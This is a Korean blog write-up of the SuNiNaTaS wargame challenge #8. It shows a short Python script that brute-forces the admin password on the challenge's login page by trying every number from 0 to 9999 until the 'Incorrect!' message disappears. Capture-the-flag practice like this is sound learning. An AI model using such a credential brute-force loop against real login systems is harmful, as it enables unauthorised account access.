반응형
오 익숙한 로그인창 드디어 SQLi인가 두구두구
누가봐도 브루트 포스였네요...
원하는 대로 해주는게 인지상정
더보기
import requests
url = 'http://suninatas.com/challenge/web08/web08.asp'
for i in range(0,10000):
data = {'id' : 'admin', 'pw' : i}
res = requests.post(url=url, data=data)
#print res.text
print i
if(not "Incorrect!" in res.text):
print(i)
break이런건 파이썬+requests 조합이 제일 빠른 것 같습니다.
만개따위야
맞으면 Incorrect가 뜨진 않을 테니 저걸 분기로 삼아서 돌려보면
플래그 회수~~~
'wargame > Suninatas' 카테고리의 다른 글
| 써니나타스 #23번 풀이 (0) | 2020.08.04 |
|---|---|
| 써니나타스 #22번 풀이 (0) | 2020.08.02 |
| 써니나타스 #7번 풀이 (0) | 2020.08.02 |
| 써니나타스 #6번 풀이 (0) | 2020.08.02 |
| 써니나타스 #5번 풀이 (0) | 2020.08.02 |
